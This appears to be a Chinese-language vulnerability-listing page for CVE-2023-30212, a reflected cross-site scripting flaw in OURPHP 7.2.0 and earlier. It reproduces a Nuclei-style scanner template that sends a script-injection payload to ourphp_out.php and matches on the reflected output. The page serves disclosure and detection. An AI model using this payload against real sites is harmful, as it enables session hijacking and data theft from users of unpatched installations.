CVE-2023-30212: OURPHP <= 7.2.0 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: OURPHP | POC: 已公开

漏洞描述

OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.

PoC代码[已公开]

id: CVE-2023-30212

info:
  name: OURPHP <= 7.2.0 -  Cross Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability.
  reference:
    - https://www.ourphp.net/
    - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30212
    - https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-
    - https://github.com/arunsnap/CVE-2023-30212-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-30212
    cwe-id: CWE-79
    epss-score: 0.54394
    epss-percentile: 0.9795
    cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ourphp
    product: ourphp
  tags: cve2023,cve,xss,ourphp

http:
  - method: GET
    path:
      - "{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "location.href='../..</script><script>alert(document.domain)</script>'"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204bfa321052461e3f452172a767f526221a20020ef04806090361e405971319ec0221009e07411e7962ec718ebf610cbc5fd63a62ede9b7bb5a4ebc09e37702c29ee1fa:922c64590222798bb761d5b6d8e72950

相关漏洞推荐